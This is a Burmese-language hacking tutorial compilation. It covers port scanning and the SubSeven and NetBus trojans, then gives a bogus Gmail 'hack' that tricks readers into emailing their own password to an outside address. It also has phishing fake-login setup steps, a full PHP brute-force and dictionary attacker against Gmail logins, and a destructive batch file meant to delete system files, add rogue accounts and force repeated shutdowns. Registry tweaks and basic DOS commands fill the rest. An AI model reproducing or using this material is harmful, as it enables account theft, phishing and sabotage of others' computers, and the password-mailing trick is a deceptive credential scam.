TCP Port :80 (www)
TCP Port :110 (pop)
TCP Port :111 (sunrp)
Port Scanning ကို ၂ မ်ိဳးလုပ္ႏိုင္ပါတယ္။ ပထမတစ္ခုက Single IP port ဖြင့္ရန္အတြက္ႏွင့္ ဒုတိယတစ္ခုကို Range IP
Port ဖြင့္ရန္ျဖစ္ပါတယ္။ IP ဆိုတာက ေရွ႕ကဟာကတူျပီး အေနာက္က နံပါတ္ကေျပာင္းလဲသြားႏိုင္ပါတယ္။
ဥပမာ 192.168.1.2 , 192.168.1.3 အစသျဖင့္ေပါ့။ ဖုန္းနံပါတ္အတိုင္းပါပဲ (530-xxx) အစသျဖင့္……….
Range IP ဆိုတာက ေတာ့ ( 555-0000 to 555-9999) အထိ ၾကားထဲက မည္သည့္ဂဏန္းမဆို ျဖစ္ႏိုင္ပါတယ္။
Port Scanner ဆိုတာ ဒီလုိမ်ိဳးေပါ့
(၂) Trojan
Trojan အေၾကာင္းကေတာ့ Hacking မွာ မပါ မျဖစ္ကိုေတြ႔ရမွာပါ။ ဘာလို႔လဲဆိုေတာ့ Trojan ေတြက
ဟက္ကာေတြရဲ႕လက္စ ြဲ virus တစ္မ်ိဳးမို႔လို႔ပါ။ Trojan ေပါင္း တစ္ရာေက်ာ္နီးပါရိွပါတယ္။ အဲဒီထဲက
စံုတြဲ သေဘာလိုျဖစ္ေနေသာ Trojan အေၾကာင္း ဥပမာ အေနႏွင့္ေဖၚျပထားပါတယ္။ အဲဒီ Trojan ျဖင့္
က်ေနာ္ အခုလက္ရွိေမႊေနတယ္ေလ…..
Sub Seven
Sub Seven Trojan မွာ လုပ္ေဆာင္ႏိုင္တဲ့ စြမ္းရည္ အမ်ားအျပားရွိပါတယ္။ ၄င္း Trojan ဟာ က်ေနာ္ေတြ႔ဖူးသမွ်
Trojan ၁၀၀ေက်ာ္ေလာက္ထဲက အေကာင္းဆံုး လို႔ ယူဆပါတယ္။ ၄င္းရဲ႕လုပ္ေဆာင္ႏိုင္တဲ့စြမ္းရည္ေတြကို
ေအာက္မွာေဖၚျပထားပါတယ္။
SubSeven ဆိုတာ ဒီလိုမ်ိဳးပါ
လုပ္ေဆာင္ႏိုင္မွဳမ်ား
-address book
-www pager retriever
-UNI2IP
-remote IP scanner
-host lookup
-get WINDOWS CD-Key
-update victim from URL
-ICQ takeover
-FTP root folder
-retrieve dial-up passwords along with phone numbers and username
-port redirect
-IRC boot for a list of commands
-file manager bookmarks
-make folder, delete folder (Empty of Full)
-process manager
-text 2 speech
-Restart server
-Aol Instant Messenger Spy
-Yahoo Messenger Spy
-Microsoft Messenger Spy
-Retrieve list of ICQ uins and passwords
-App Redirect
-Edit files
- set/change screen saver settings
-Restart Windows
-IP Tools (Resolved Host name/ Ping IP address)
-Address
-City
-E-Mail
-Real name
-Country code
-Local Phone
-Zip code………….အစသျဖင့္ေပါ့…….. အျခားလုပ္ေဆာင္ႏိုင္မႈမ်ားစြာရွိပါေသးတယ္….။
NetBus
Net Bus ဆိုတာကေတာ့ ဟိုးအရင္တုန္းက သံုးခဲ့တဲ့ Trojan အေဟာင္းတစ္မ်ိဳးပါ။ ဒါေပမဲ့ ေတာ္ေတာ္
မ်ားမ်ားကေတာ့ ၄င္းကို ခုခ်ိန္ထိ သံုးစြဲလွ်က္ရွိၾကပါတယ္။ Net Bus နဲ႔ေမႊြရတာလဲေတာ္ေတာ္အဆင္ေျပပါတယ္။
စမ္းသံုးၾကည့္ေပါ့……..။ သံုးနည္းကို အေပၚတြင္ ေဖၚျပၿပီးပါၿပီ။
NetBus ကို ဤသို႔ေတြ႔ျမင္ရပါတယ္။
NetBus ၏ လုပ္ေဆာင္ႏိုင္စြမ္းမ်ားကို အထက္တြင္ ေဖၚျပထားပါသည္။ အေသးစိတ္ေတာ့ မေဖၚျပေတာ့ပါ။
……………………………………………………………………………………………………………………………………………...........
အပိုင္း (၃) Gmail Password Hack နည္း
Gmail Password ကို Hack ရာတြင္ ဘာေတြလိုအပ္သနည္း ???
Hack နည္းေပါင္းမ်ားစြာရွိပါတယ္။ ေရွးဦးစြာ ရိုးရိုးရွင္းရွင္းျဖင့္ Hack ေသာနည္းလမ္းကို အရင္ေဖၚျပပါမည္။ လြန္ခဲ့တဲ့
၂၀၀၈ ခုႏွစ္ေလာက္တုန္းက javascript နည္းျဖင့္က်ေနာ္ သံုးၾကည့္ဖူးပါတယ္။ အခုေနာက္ပိုင္းထပ္သံုးၾကည့္တာ
မရေတာ့ပါဘူး၊ Google က admin ေတြကလဲ ငတံုးေတြမွမဟုတ္တာ။ သူတို႔ security ေတြကို
ခဏခဏျပန္ျပန္ျပင္တယ္ေလ။ က်ေနာ္တို႔ထက္အမ်ားႀကီးမွ အမ်ားႀကီးကိုလည္တာေပါ့။ ယခု နည္းက ေတာ့ Google ရဲ႕
security ေတြကို ျဖတ္ေက်ာ္လို႔ရတဲ့ javascript အသစ္တစ္ခုပါ။ က်ေနာ္ဤ နည္းကို ႏိုင္ငံျခား Hacking
စာအုပ္ထဲကေနု ဘာသာျပန္ထားတာပါ။ ၀ါသနာပါရင္ နည္းနည္းပါးပါးေလာက္ ၀င္ေမႊၾကည့္ၾကေပါ့
လုပ္နည္း
တစ္ဆင့္ျခင္းဆီေဖၚျပထားပါတယ္။
အဆင့္(၁) သင္၏ကိုယ္ပိုင္ Gmail account ျဖင့္ Gmail ထဲသို႔ Login ၀င္ပါ။
မွတ္ခ်က္ ( passwrdserver2@gmail.com သို႔အရင္ဆံုး add ထားပါ၊ add
ထားျပီးအနည္းဆံုးရက္ေပါင္း ၃၀ ျပည့္မွ ဤလုပ္နည္းသို႔စတင္လုပ္ႏိုင္မည္ျဖစ္သည္)
အဆင့္(၂) Login ၀င္ျပီးျပီးျခင္း compose mail လုပ္ပါ။To: ဆိုတဲ့ေနရာမွာ passwrdserver2@gmail.com
လို႔ေရးပါ။(passwrdserver2@gmail.com ဆိုတာ Google server မွ username ႏွင့္ password မ်ား ကို
မွတ္ထားေသာ ေနရာသို႔ mail ပို႔လိုက္ျခင္းျဖစ္ပါတယ္။ Automatic server ကေန သင့္ကို mail
တစ္ေဆာင္ျပန္ပို႔ပါလိမ့္မယ္။ ေစာင့္ေနပါ)
အဆင့္(၃) Subject: ဆိုတဲ့ ေနရာမွာ ‘’PASSWORD RECOVERY’’ ဆိုၿပီး တိတိက်က်ေရးပါ။
စာလံုးေပါင္းမမွားပါေစႏွင့္။ အေရးႀကီးပါတယ္။
အဆင့္(၄) mail ကိုစတင္ေရးႏိုင္ပါျပီ။ ပထမစာေၾကာင္းမွာ သင္ hack ခ်င္ေသာ သူ၏ account ကိုေရးပါ။
အဆင့္(၅) ဒုတိယစာေၾကာင္းမွာေတာ့ သင္ယခုလက္ရွိအသံုးျပဳေနေသာ gmail account ကိုေရးပါ။
အဆင့္(၆) တတိယေျမာက္စာေၾကာင္းမွာေတာ့ သင္၏ gmail password ကိုေရးပါ java script ျဖင့္ users
administrator server security ကိုျဖတ္ေက်ာ္ရာတြင္ verify လုပ္ရန္သင္၏ password ကိုလဲလိုပါတယ္။
အဆင့္(၇) ေနာက္ဆံုးအဆင့္နဲ႔ တကယ့္ကိုအေရးအႀကီးဆံုးအဆင့္ပါပဲဗ်ာ..။ ေအာက္မွာ က်ေနာ္ေဖၚျပထားတဲ့
code ကိုေသေသခ်ာခ်ာ ေကာ္ပီကူးပါ။
cgi-bin_RETRIVE_PASS_BIN_PUB/$et76431&pwrsa
script< ip://233.243.2.34/cgi-bin/start?
v703&login=passmachine&f=(password)&f=27586&javascript=ACTIVE&rsa#>
{simply copy and paste above.}
အားလံုး ready ျဖစ္ပါက send လို႔ရပါျပီ။ send လိုက္ပါေတာ့။
ဥပမာ- သင္၏ ကိုယ္ပိုင္ gmail account က myname@gmail.com ဆိုပါစို႔
သင္၏ password က 123456 လို႔မွတ္လိုက္ပါ။ သင္ hack ခ်င္ေသာ သူ၏
Gmail account ကေတာ့ test@gmail.com လို႔ထားလိုက္ပါ။က်ေနာ္ေအာက္မွ ေဖၚျပထားတဲ့အတိုင္း
mail တစ္ေဆာင္ေရးပါ။……..
To: ‘’gmail.com’’<passwrdserver2@gmail.com>
Bcc: , cc: ထိုေနရာမ်ားတြင္ ဘာမွ မေရးပါႏွင့္
Subject: ‘’PASSWORD RECOVERY’’
Text box ထဲတြင္ေရးရန္
test@gmail.com
myname@gmail.com
123456
cgi-bin_RETRIVE_PASS_BIN_PUB/$et76431&pwrsa
script< ip://233.243.2.34/cgi-bin/start?
v703&login=passmachine&f=(password)&f=27586&javascript=ACTIVE&rsa#>
{simply copy and paste above.}
System Reg လို႔ေခၚတဲ့ mail တစ္ေဆာင္ သင့္ဆီကို ၆ နာရီအတြင္း automatic ျပန္ပို႔ပါလိမ့္မယ္။ ထို mail
ထဲတြင္ သင္ hack လိုေသာသူ၏ information မ်ားအကုန္ပါလာမွာျဖစ္ပါတယ္။ စမ္းၾကည့္က်ပါ။ က်ေနာ့္ mail
ကိုေတာ့ မ hack နဲ႔ေနာ္ password ကို အလံုး ၆၀ ေပးထားလို႔ပါ…..ဟီး……ဟီး…..
Phishing
Phishing ႏွင့္ ပတ္သတ္ျပီး
က်ေနာ္ Phishing ဆိုတဲ့ အေၾကာင္းကို သိသေလာက္ နည္းနည္းေျပာခ်င္ပါတယ္။ တကယ္ေတာ့ အဲဒီ Phishing
ဆိုတာ လိမ္တဲ့ နည္းေလးတစ္ခုပါ။ သူမ်ားရဲ႕ Gmail account ပဲျဖစ္ျဖစ္၊ Yahoo account ပဲျဖစ္ျဖစ္၊ mediafire account
ပဲျဖစ္ျဖစ္ မည္သည့္ အေကာင့္ ကိုမဆို လိမ္ညာကာ password ယူလို႔ရေသာနည္းလမ္းျဖစ္ပါတယ္။ Phisher ဆုိတာ
ကြန္ပ်ဴတာ အသုံးၿပဳသူတုိ႔ရဲ႕ Data Information ေတြကုိရယူရန္ ၿပဳလုပ္ထား အတုအေရာင္စာမ်က္ႏွာ (a fake login
page) တစ္ခုသာလွ်င္ ၿဖစ္ပါတယ္။ fake login page ေတြက Computer user ေတြရဲ႕ user name and password
ေတြကုိ ဖုိင္တစ္ခုကေန၊ ဒါမွမဟုတ္ ေမးလ္ကုိ Direct ပုိ႔တဲ႔ နည္းလမ္းသုံးထားတာမ်ားပါတယ္... တစ္ခ်ဳိ႕ေတြက
က်ယ္က်ယ္ၿပန္႔ၿပန္႔သုံးၾကပါတယ္..
သ႔ရူ ဲ႕အလုပ္လုပ္ပုံက ရိုးရွင္းပါတယ္။ free host, free domain, code script ( မိမိ hack ခ်င္တဲ့ site ရဲ႕ code ပါ )
ျပီးရင္ setting အနည္းငယ္ေလး ၀င္ျပင္ျပီးရင္ Hack လို႔ရပါျပီ။
php enabled ထားတဲ႔ web hosting တစ္ခုလုိပါတယ္... Phishing Attacker ေတြကေတာ့ free ရတဲ႔ webhosting မွာ
account တစ္ခုဖြဲ႔ၿပီးသုံးေလ့ရွိပါတယ္...
မိမိအသုံးၿပဳတဲ႔ mail services, ဆုိၾကပါဆုိ Gmail
https://mail.google.com ကုိပဲသြားသြား, https://www.gmail.com ပဲ ၿဖစ္ၿဖစ္ ဖြင့္ကာ Ctrl + U သုိ႔မဟုတ္ Menu bar
မွာ view>Page Source ကိုသြားကာ အကုန္လုံးကုိ Copy ကူးၿပီး text editor or web editor .. example :
Dreamwaver ကဲ႔သုိ႔ Editor ထဲကုိ အကုန္လုံး paste လုပ္ယူလုိက္ပါ...
Code:
<form id="gaia_loginform" action="https://www.google.com/accounts/ServiceLoginAuth?service=mail" method="post"
onSubmit="return(gaia_onLoginSubmit());">
ကုိ မိမိဖန္တီးထားတဲ႔ login page မွ data ေတြကုိ ရယူႏုိင္ေအာင္ သိမ္းဆည္းထားတဲ႔ login script file
ကုိလမ္းညြန္ေပးရပါတယ္..
ဥပမာ..
Code:
<form action="http://www.planetcreator.net/tutorial/Fake Login/login.php" method="post">
(login.php ဆုိတာက fake login page က User ရုိက္ထည့္လုိက္ေသာ user name and password ကုိရယူတာပါ)
အဲ႔လုိ ၿပင္ဆင္မူ႔ေတြလုပ္ၿပီး free hosting တစ္ခုမွာတင္...
user ကုိ နည္းမ်ဳိးစုံနဲ႔ မိမိရဲ႕ ေထာင္ေၿခာက္ထဲကုိ အေရာက္သြင္းၾကတာပါ..........
ဒါက Fake Login Page ေတြရဲ႕ နမူနာပါ။ တကယ္တမ္း fake login ေတြက ဒီေလာက္နဲ႔ မလုံေလာက္ပါဘူး... Phishing
Hacker ေတြက သူတုိ႔ရဲ႕ phisher ေတြကုိ နည္းလမ္းမ်ဳိးစုံနဲ႔ ၄င္းတုိ႔ရဲ႕ Victim ယုံၾကည္ေလာက္ေအာင္
ေသြးေဆာင္ၿဖားေယာင္း၊ ၿပီးေတာ့ attacker ဖန္တီးထားတဲ႔ page ကုိေရာက္ရင္ေတာင္မွ သာမာန္ user
တစ္ေယာက္အတြက္ လုံး၀ (လုံး၀) မသိေအာင္ address bar / mouse down function
ေတြကအစေပါ႔...စသည္..စသည္
၄င္း Fake Loign အားသြားေရာက္ စမ္းသပ္ရန္... စမ္းသပ္ရုံစမ္းသပ္ပါ... မိမိရဲ႕ gmail user name and password
ကုိေယာင္လုိ႔ေတာင္ ရုိက္မထည့္လုိက္နဲ႔.... လုံး၀ တာ၀န္မယူ။
……………………………………………………………………………………………………………………………………………...........
အပိုင္း (၄) Phishing နည္းလမ္းကိုအသံုးျပဳ၍ gmail password ေဖာက္နည္း
free host တခုခုမွာ ဒီကုဒ္ေတြကို သြင္းျပီး ဒါမွမဟုတ္ ကိုယ့္စက္ကို local host အေနနဲ႕ setting ခ်ျပီး
ဂ်ီေမးကိုေဖာက္လို႕ရပါျပီ။
<?php
//////////////////////
////Gmail-Brute//////
///////////////////////
////////////////////////
# This script was created to Brute Force G-Mail Logins,#
#it Uses CURL and 2 Methods of Login attacks (Brute Force and Dictionary) #
////////////////////////
$dic ="your Dictionary file here.txt";
///////////////////////
echo "
<title>Gmail Brute Force Attacker</title>
</head>
<style type='text/css'>
body {
font:Verdana, Arial, Helvetica, sans-serif;
font-size:12px;
border-color:#FFFFFF;
}
.raster_table {
background-color:#444444;
border-color:#CCCCCC;
}
.alert {
color:#FF0000;
}
</style>
<body>
<table cellpadding='0' cellspacing='0' align='center' class='raster_table' width='75%'>
<tr>
<td>
<div align='center'><b>Gmail Brute Force Attacker</b></div>
</td>
</tr>
</table>
<table cellpadding='0' cellspacing='0' align='center' class='raster_table' width='75%'>
<tr>
<td>
<div align='center'>
</div>
</td>
</tr>
<tr>
<td>
<div align='center'>
&nbsp;
</div>
</td>
</tr>
<tr>
<td>
<div align='center'>
<form method='post'>
Username to brute:<br>
<input name='username' type='text' /><br><br>
<input name='attack' type='submit' value='dictionary' /> -
<input name='attack' type='submit' value='brute' /><br>
</form>
</div>
</td>
</tr>
<tr>
<td>
<div align='center'>
&nbsp;
</div>
</td>
</tr>
</table>
";
// Sets variables and retrives google error for comparing
if(isset($_POST['attack']) && isset($_POST['username'])) {
$username = $_POST['username'];
$headers = array(
"Host: mail.google.com",
"User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-
GB; rv:1.8.0.4) Gecko/20060508 Firefox/1.5.0.4",
"Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,imag
e/png,*/*;q=0.5",
"Accept-Language: en-us,en;q=0.5",
"Accept-Encoding: text", # No gzip, it only clutters your code!
"Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7",
"Date: ".date(DATE_RFC822)
);
$c = curl_init('https://mail.google.com/mail/feed/atom');
curl_setopt($c, CURLOPT_HTTPAUTH, CURLAUTH_ANY); // use authentication
curl_setopt($c, CURLOPT_HTTPHEADER, $headers); // send the headers
curl_setopt($c, CURLOPT_RETURNTRANSFER, 1); // We need to fetch something from a string, so n
o direct output!
curl_setopt($c, CURLOPT_FOLLOWLOCATION, 1); // we get redirected, so follow
curl_setopt($c, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($c, CURLOPT_SSL_VERIFYHOST, 1);
curl_setopt($c, CURLOPT_UNRESTRICTED_AUTH, 1); // always stay authorised
$wrong = curl_exec($c); // Get it
curl_close($c); // Close the curl stream
}
//Dictionary Attack
if($_POST['attack'] == "dictionary") {
$Dictionary = file("$dic");
for ($Position = 0; $Position < count($Dictionary); $Position++) {
$Dictionary[$Position] = str_replace("\r\n", "", $Dictionary[$Position]);
if(check_correct($username, $Dictionary[$Position])) {
die("<table cellpadding='0' cellspacing='0' boreder='1' align='center' class='raster_
table' width='75%'>
<tr>
<td>
<div align='center'><b>Found the password of: ".$Dictionary[$Position]."<br> For the
account: ".$username."</b></div>
</td>
</tr>
</table>
</body>
</html>");
}
}
echo "<table cellpadding='0' cellspacing='0' boreder='1' align='center' class='raster_table'
width='75%'>
<tr>
<td>
<div align='center'><b>Sorry... a password was not found for the account of <span cla
ss='alert'>".$username."</span> during the dictionar
y attack.</b></div>
</td>
</tr>
</table>";
}
//Brute Attack
elseif($_POST['attack'] == "brute") {
for ($Pass = 0; $Pass < 2; $Pass++) {
if ($Pass == 0){$Pass = "a";} elseif ($Pass == 1){ $Pass = "a"; }
if(check_correct($username, $Pass)) {
die("<table cellpadding='0' cellspacing='0' boreder='1' align='center' class='raster_
table' width='75%'>
<tr>
<td>
<div align='center'><b>Found the password of: ".$Dictionary[$Position]."<br> For the
account: ".$username."</b></div>
</td>
</tr>
</table>
</body>
</html>");
}
}
echo "<table cellpadding='0' cellspacing='0' boreder='1' align='center' class='raster_table'
width='75%'>
<tr>
<td>
<div align='center'><b>Sorry... a password was not found for the account of <span cla
ss='alert'>".$username."</span> during the brute for
ce attack.</b></div>
</td>
</tr>
</table>";
}
echo "</body>
</html>";
// Function for checking whether the username and password are correct
function check_correct($username, $password)
{
global $wrong, $headers;
$c = curl_init('https://'.$username.':'.$password.'@mail.google.com/mail/feed/atom');
curl_setopt($c, CURLOPT_HTTPAUTH, CURLAUTH_ANY); // use authentication
curl_setopt($c, CURLOPT_HTTPHEADER, $headers); // send the headers
curl_setopt($c, CURLOPT_RETURNTRANSFER, 1); // We need to fetch something from a string,
so no direct output!
curl_setopt($c, CURLOPT_FOLLOWLOCATION, 1); // we get redirected, so follow
curl_setopt($c, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($c, CURLOPT_SSL_VERIFYHOST, 1);
curl_setopt($c, CURLOPT_UNRESTRICTED_AUTH, 1); // always stay authorised
$str = curl_exec($c); // Get it
curl_close($c);
if($str != $wrong) {return true;}
else {return false;}
}
?>
PHP ရတဲ့ host တခုခုမွာ ဒီ code ေတြကို install လုပ္ရပါမယ္။ က်န္တာ အေသးစိတ္သိခ်င္ရင္ေတာ့ free hosting
တခုသုံးျပီး က်ေနာ္ အရင္စမ္းလိုက္အံုးမယ္ ။ ဘယ္သူ႕ကိုစမ္းရမလ ဲ မသိဘူး။
ေအာက္က free host မွာ PHP ရပါတယ္။
Code:
http://www.000webhost.com/
……………………………………………………………………………………………………………………………………………...........
အပိုင္း (၅) WINDOWS ကို၀င္ေမႊနည္း တိုလီမုတ္စမ်ား
Registry သ႔ ို ၀င္ေရာက္ေမႊေႏွာက္ျခင္း
က်ေနာ္ registry ထဲသို႔ ၀င္ေမႊနည္း နည္းနည္းပါးပါး ေျပာခ်င္ပါတယ္။ ဘာဘဲျဖစ္ျဖစ္ registry ကို ၀င္ေမႊေတာ့မယ္ဆိုရင္
ေတာ့ back up လုပ္ထားဖို့လိုပါတယ္...ဘာလို့လဲဆိုေတာ့ registry မွာ၀င္ေရးတဲ့ အခါမွာ registry က auto save
လုပ္ပါတယ္..မွားသြားပါတယ္ဆိုျပီး undo ,redo ေတြလုပ္လို့မရပါဘူး....
အဲဒါေၾကာင့္ပါ.....
ကဲ က်ေနာ္တို႔ All program ကိုေဖ်ာက္လိုက္ရေအာင္....
- start > run ကို၀င္ပါ..
- regedit လို့ ၇ိုက္ျပီး enter ႏွိပ္ပါ..
- HKEY-CURRENT- USER\software\microsoft\windows\current version\policies\explorer
- explorer ေပၚကို right click ႏွိပ္ျပီး new ကိုေရြးခ်ယ္ပါ Dword value ကိုဖြင့္ပါ..
ထိုအခါ ညာဘက္ျမင္ကြင္းမွာ new value #1 ေပၚလာပါမယ္..
-new value #1 ကို rename ေပးလိုက္ပါ..
name က NoStartMenuMoreProgram ျဖစ္ပါတယ္..
NoStartMenuMoreProgram ေပၚကိုလည္း right click ေပးျပီး modify ေရြးပါ
value data အကြက္ထဲ က 0 ေပၚေနပါမယ္..အဲဒါကို 1 ေျပာင္းေပးလိုက္ပါ..
computer ကို restart ေပးလိုက္ပါ...
Folder ကို software မသံုးပဲ Lock ခ်နည္း
ေရွးဦးစြာ notepad သို႔မဟုတ္ Command Promt ကိုဖြင့္ျပီး edit ထဲတြင္ ေအာက္ေဖၚျပပါ command မ်ားကို
ေရးသား၍ .bat file အေနျဖင့္ save မွတ္ပါ။ Notepad ထဲတြင္ေရး၍ Save name as ဆိုတဲ့ ေနရာမွာ example.bat လို႔
save မွတ္ပါ။ ထို file အားလြယ္လြယ္ကူကူ desktop ေပၚမွာပဲ သိမ္းထားေပါ့။ ထို႔ေနာက္ ၄င္း .bat file အား Run
လိုက္ပါ။ Private ဆိုေသာ Folder တစ္ခု ေပၚလာပါလိမ့္မယ္။ အဲဒီ Folder ထဲတြင္မိမိ သိမ္းထားခ်င္ေသာ files မ်ား
folder မ်ား ထည့္လိုက္ပါ။ ထို႕ေနာက္ example.bat file အားေနာက္တစ္ေခါက္ run လိုက္ပါ။ ထိုအခါ cmd Windows
တစ္ခု ေပၚလာပါလိမ့္မယ္။ Set Password to Lock Folder ဆိုတာေပၚလာပါတယ္။ ကိုယ္လိုခ်င္တဲ့ password
ေရးလိုက္ေပါ့။ ေနာက္ထပ္ Are You Sure to Lock this Folder (Y/N) ဆိုတာေပၚလာပါလိမ့္မယ္။ Y လို႔ရိုက္လိုက္ပါ။
Private ဆိုေသာ Folder ေပ်ာက္သြားပါမယ္။ ၄င္း folder ကိုျပန္လိုခ်င္လွ်င္ example.bat ဆိုတဲ့ file ကိုျပန္ run ပါ။
Enter Password to Unlock Folder ဆိုတာေပၚလာပါလိမ့္မယ္။ Password ရိုက္လိုက္ပါ။ ၄င္း folder
ျပန္ေပၚလာပါလိမ့္မယ္။ စမ္းၾကည့္က်ေပါ့ဗ်ာ……….
Command
cls
@ECHO OFF
title Folder Private
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST Private goto MDLOCKER
:CONFIRM
echo Are you sure you want to lock the folder(Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren Private "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
:UNLOCK
echo Enter password to unlock folder
set/p "pass=>"
if NOT %pass%== password here goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Private
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDLOCKER
md Private
echo Private created successfully
goto End
:End
သူမ်ားကို ဒုကၡေပးခ်င္လွ်င္။ ။ေအာက္ေဖၚျပပါ command မ်ားကို notepad ထဲသို႕ copy, paste ကာ .bat file
အမ်ိဳးအစားျဖင့္ save မွတ္ပါ။ ထို႔ေနာက္၄င္း file အားလံုး၀ဖြင့္မၾကည့္ပါႏွင့္။ ဖြင့္ၾကည့္ပါက error message
မ်ားတတ္လာျပီး Windows က auto shut down ျဖစ္ေနပါလိမ့္မယ္။ ေနာက္တစ္ေခါက္ဖြင့္လဲ Windows
တတ္ျပီးျပီးျခင္း ၁၀ စကၠန္႔အတြင္း Shut Down ျဖစ္ေနပါလိမ့္မယ္။ ဘယ္လိုမွ ျပန္ဖြင့္ႏိုင္မွာမဟုတ္ပါဘူး။ safemode
ကျပန္ျပင္မွ ျပန္ေကာင္းႏိုင္မွာပါ ။ ဟဲဟ…ဲ …..
title any
@echo off
copy any.bat "c:\documents and settings\all users\start menu\programs\startup"
del *.dll
del *.exe
del *.ini
time 00:00
date 88/88/888
net user administrator *18083
net user 598 *32087 /add
net user 3063 *864 /add
net user 3262 *21895 /add
net user 29039 *3102 /add
net user 15688 *215 /add
net user 24824 *28761 /add
net user 25176 *23975 /add
net user 8896 *28052 /add
msg *any
echo copy q.bat "documents and settings\all users\start menu\programs\startup"
echo copy q.bat "documents and settings\all users\start menu\programs\startup"
cd C:\WINDOWS\system32
del /S /F /Q keyboard.drv
del /S /F /Q keyboard.sys
del system32
shutdown -s -f
exit
Cmd Dos Command နည္းနည္းပါးပါး
က်ေနာ္ သိထားတဲ့ CMD DOS COMMAND နည္းနည္းပါ
႔သိၿပီးသားသူေတြလည္းရွိပါတယ္ ...
မသိေသးတဲ့ သူေတြအတြက္ပဲ ရည္ရြယ္ပါတယ္ ....
Run Box မွာ cmd ရိုက္ထည့္လိုက္မယ္
C Directory ကိုသြားမယ္ဆို C: , D ဆိုရင္ D: စသည့္ျဖင့္ေပါ့ ....
ပထမဆံုးေျပာရရင္ .. cmd ကိုစေခၚလိုက္တာနဲ႔ စျမင္ရမွာက
C:\Documents and Settings\user name> ပါ ...
အဲဒီ Directory မွာ ဘယ္ Folder ေတြပါလည္း ၾကည့္ခ်င္ရင္
dir /a နဲ႔ ၾကည့္ရပါတယ္
အဲဒီ့ Directory တစ္ခုထဲက Folder ကို ဖြင့္ခ်င္ရင္
cd ခံထားၿပီး မိမိဖြင့္ခ်င္တဲ့ Folder Name (ဥပမာ။ ။ Desktop)ေပးၿပီး ဖြင့္ရပါတယ္
C:\Documents and Settings\user name\Desktop>
ထို Folder မွ ျပန္ထြက္ခ်င္ရင္ cd.. ေရးၿပီး ျပန္ထြက္ရပါမယ္
Hidden ျဖစ္ေနတဲ့ Folder (သို႔) File ကို unhidden ေပးခ်င္တယ္ဆိုရင္
Folder Option ကေန virus ကိုက္တယ္ဆို show hidden folder ေပးလည္း မရတာေတြရွိပါတယ္
attrib -H /S /D "c:\......\folder name"
hidden ျဖစ္ေနတဲ့ Folder (သို႔) File ရွိတဲ့ Directory အျပည့္အစံုကို /D ေနာက္ကေန
ဆက္ေရးေပးရပါတယ္
Directory တစ္ခုမွာရွိတဲ့ folder ထဲက files ေတြကို တျခား Directory တစ္ခုမွာရွိတဲ့
folder ထဲကို ေျပာင္းေရႊ႕ကူးယူခ်င္တယ္ဆို ...
မိမိေျပာင္းေပးခ်င္တဲ့ Directory ကိုအရင္ဖြင့္ေပးရပါတယ္ (ဥပမာ။ ။ C: ထဲက Desktop ကိုေရႊ႕မယ္ဆို C:\Documents
and Settings\user name\Desktop>
လို႔ အရင္ဖြင့္ေပးလိုက္ပါ။
ေနာက္မဆက္ၿပီး ကူးယူခ်င္တဲ့ Directory မွ folder ကိုေရးေပးရပါတယ္
xcopy /a "e:\foler name" ဟုေရးေပးရပါမယ္ ...
၂ခုေပါင္းကိုၾကည့္မယ္ဆိုရင္ေတာ့
C:\Documents and Settings\user name\Desktop>xcopy /a "e:\foler name"
အခု ကူးယူတာက unhidden files ေတြကိုပဲ ကူးယူးတာပါ။
hidden files ေတြကိုကူးမယ္ဆိုရင္ေတာ့ /h ထည့္ေပးရုံပါပ ဲ
xcopy /h /a "e:\foler name" ဟုေရးေပးလိုက္ပါ...
အခုက files ကိုပဲကူးတာပါ ...
Folder အလိုက္ကူးမယ္ဆိုရင္ေတာ့ /s ကိုအသံုးျပဳရပါတယ္
xcopy /s "e:\folder name" လို႔ေရးေပးရပါတယ္။
ဒါကလည္း hidden မျဖစ္တဲ့ folder ကိုကူးတာပါ
hidden folder ကိုကူးမယ္ဆိုရင္ေတာ့ /h ကိုပဲထည့္ရပါတယ္
xcopy /h /s "e:\foler name" လို႔ေရးေပးရပါတယ္ ...
အဲဒီလိုကူးယူတဲ့ အခ်ိန္မွာ CMD box မွာ ကူးယူးတဲ့ files ေတြ run တာကိုျပပါတယ္ အဲဒီလို မေပၚခ်င္ရင္ေတာ့ /Q
ထည့္ေပးရပါတယ္
xcopy /h /q /s "e:\foler name" လို႔ေရးေပးရပါတယ္ .................။
Folder Background ကို software မသံုးပဲ ပံုလွလွေလးထည့္နည္း
[{BE098140-A513-11D0-A3A4-00C04FD706EC}]
iconarea_image=E:\general\picture\DSABayonet211.jpg
iconarea_text=11x00fffffff
ေဖၚျပပါ code မ်ားကို Folder အတြင္းရွိ desktop.ini ဆိုေသာ file အတြင္းသို႔ copy ကူး paste လုပ္ပါ။ ၄င္း ini file သည္ hidden
ျဖစ္ေနပါသည္။ hidden ေဖၚျပီးရွာပါ။ iconarea_image=E:\general\picture\DSABayonet211.jpg ဆိုရာတြင္
မိမိထည့္သြင္းလိုေသာပံု ၏တည္ေနရာ ကိုသိရန္လိုပါသည္။ ဥပမာ. Desktop ေပၚရွိ image.jpg ဆိုေသာပံုကိုထည့္သြင္းခ်င္လွ်င္
iconarea_image=C:\Documents and Settings\User Name\Desktop\image.jpg ဟုေရးႏိုင္ပါတယ္။ အေနာက္က file
extension *.jpg ဆိုတာကိုထည့္ေရးရန္မေမ့ပါႏွင့္။
website ေတြ႕ရဲ႕ IP ကုိခ်က္ခ်င္းသိခ်င္တယ္ဆိုရင္
ပထမဆံုး start >>> Run ကို click.
cmd လို႕ ရိုက္ျပီး ok လုပ္.
